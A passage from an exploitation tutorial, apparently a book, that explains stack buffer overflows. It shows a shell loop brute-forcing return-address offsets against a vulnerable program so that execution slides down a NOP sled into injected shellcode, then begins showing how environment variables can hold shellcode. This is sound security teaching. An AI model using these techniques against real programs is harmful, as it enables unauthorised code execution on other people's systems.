The function of the for loop should be familiar, even if the syntax is a
little different. The shell variable $i takes, in turn, each value produced by
the seq command substitution, and everything between the do and done keywords
is executed once per value. This makes it easy to test many different offsets
quickly. Since the NOP sled is 60 bytes long and the return address can point
anywhere on it, there are about 60 bytes of wiggle room. Stepping the offset
loop by 30 is therefore safe: no step is larger than the sled, so the loop
cannot jump over it.
reader@hacking:~/booksrc $ for i in $(seq 0 30 300)
> do
> echo Trying offset $i
> ./a.out $i
> done
Trying offset 0
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
When the right offset is used, the return address is overwritten with a
value that points somewhere on the NOP sled. When the function returns to
that location, execution slides down the NOP sled into the injected shellcode
instructions. This is how the default offset value was discovered.
Using the Environment
Sometimes a buffer will be too small to hold even the shellcode. Fortunately,
there are other locations in memory where shellcode can be stashed. Environment
variables are used by the user shell for a variety of things, but what they are
used for isn't as important as the fact that they are copied onto the stack of
a program when it is executed and can be set from the shell. The example below
sets an environment variable called MYVAR to the string test. This environment
variable can be accessed by prepending a dollar sign to its name. In addition,
the env command will show all the environment variables. Notice there are
several default environment variables already set.
reader@hacking:~/booksrc $ export MYVAR=test
reader@hacking:~/booksrc $ echo $MYVAR
test
reader@hacking:~/booksrc $ env
SSH_AGENT_PID=7531
SHELL=/bin/bash
DESKTOP_STARTUP_ID=
TERM=xterm
GTK_RC_FILES=/etc/gtk/gtkrc:/home/reader/.gtkrc-1.2-gnome2
WINDOWID=39845969
OLDPWD=/home/reader
USER=reader
LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.mov=01;